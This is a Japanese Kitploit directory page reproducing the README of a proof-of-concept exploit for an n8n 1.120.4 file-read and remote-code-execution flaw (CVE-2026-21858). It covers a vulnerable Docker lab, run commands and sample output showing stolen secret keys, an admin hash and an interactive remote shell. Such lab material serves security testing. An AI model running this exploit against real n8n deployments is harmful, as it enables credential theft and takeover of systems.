Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21858 — CVE-2026-21858(n8n 1.120.4 の任意ファイル読み取りおよび RCE 脆弱性)の Docker ベース PoC 環境とエクスプロイトスクリプトで、シークレット抽出とインタラクティブシェルを提供します。 | Kitploit
ツール/GitHubGitHub/yym8538/cve-2026-21858
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用セキュリティ仮想化ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubyym8538/cve-2026-21858

CVE-2026-21858

CVE-2026-21858(n8n 1.120.4 の任意ファイル読み取りおよび RCE 脆弱性)の Docker ベース PoC 環境とエクスプロイトスクリプトで、シークレット抽出とインタラクティブシェルを提供します。

リポジトリを見る
141ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-21858 RCE

Form Trigger ワークフローとエクスプロイトスクリプトを備えた n8n 1.120.4 用の PoC 環境。

要件

  • Docker (Windows では Docker Desktop)
  • Python 3.x (攻撃側)

ファイル

  • Dockerfile — 脆弱な n8n 環境をビルドする
  • run.bat — コンテナを実行する (Windows)
  • workflow.txt — n8n ワークフロー (Form Trigger を含む)
  • poc.py — PoC スクリプト
  • requirements.txt — PoC の依存関係

環境構築

  1. Docker イメージをビルド
docker build -t n8n-vuln:1.120.4 .
  1. 環境を実行 (Windows)
run.bat
  1. n8n の設定
  1. ブラウザで n8n を開く
  2. admin としてログイン
  3. 新しいワークフローを作成
  4. workflow.txt を貼り付け
  5. ワークフローをアクティベート
  6. Form Trigger URL をコピー

概念実証 (PoC)

  1. 依存関係をインストール (攻撃側)
pip3 install -r requirements.txt
  1. エクスプロイトを実行
python3 poc.py
  • プロンプトが表示されたら Form Trigger URL を貼り付けてください。

期待される結果

  • PoC はターゲットから機密性の高い n8n アセット (例: FINAL_SECRET_KEY、管理者識別子) を抽出します。
  • 対話型シェルプロンプト (n8n-shell>) が提供されます。
  • コマンド (例: id) を実行すると、ターゲット環境から出力が返されます (RCE)。

出力例

[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."

=== n8n Shell Ready ===
n8n-shell> id

[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------

EQST Insight

当社は CVE およびマルウェア分析を毎月公開しています。ご興味があれば、以下のリンクから当社の出版物をご覧ください。

  • KR : https://www.skshieldus.com/security-insights/reports/n8n_arbitrary_file_read_vulnerability_cve_2026_21858
  • EN : https://www.skshieldus.com/en/report?tab=eqst
ツールをダウンロード